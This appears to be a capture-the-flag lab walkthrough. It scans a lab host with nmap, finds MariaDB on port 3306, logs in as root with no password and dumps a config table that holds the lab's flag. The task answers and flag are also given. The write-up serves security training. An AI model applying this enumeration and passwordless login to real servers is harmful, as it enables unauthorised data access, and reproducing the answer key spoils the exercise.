 Task 1

During our scan, which port do we find serving MySQL? 

──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p- -T5 10.129.112.2  
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-04 23:00 EST
Warning: 10.129.112.2 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.112.2
Host is up (0.13s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 66
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, SupportsCompression, SupportsTransactions, ConnectWithDatabase, IgnoreSigpipes, Speaks41ProtocolNew, InteractiveClient, ODBCClient, LongColumnFlag, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: GFgW[F);-nd+E]"1nWKO
|_  Auth Plugin Name: mysql_native_password
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 813.87 seconds


Ans: 3306

 Task 2

What community-developed MySQL version is the target running? 

Ans: MariaDB

 Task 3

When using the MySQL command line client, what switch do we need to use in order to specify a login username? 

Ans: -u

 Task 4

Which username allows us to log into this MariaDB instance without providing a password? 

#
┌──(kali㉿kali)-[~]
└─$ mysql -h 10.129.112.2 -u root
#

Ans: root

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table? 

Ans: *

 Task 6

In SQL, what symbol do we need to end each query with? 

Ans: ;

 Task 7

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host? 

#
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.087 sec)
#

#
MariaDB [(none)]> show full tables from htb;
+---------------+------------+
| Tables_in_htb | Table_type |
+---------------+------------+
| config        | BASE TABLE |
| users         | BASE TABLE |
+---------------+------------+
#

#
MariaDB [(none)]> use htb;
#

#
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
#




Ans: HTB


Flag: 7b4bec00d1a39e3dd4e021ec3d915da8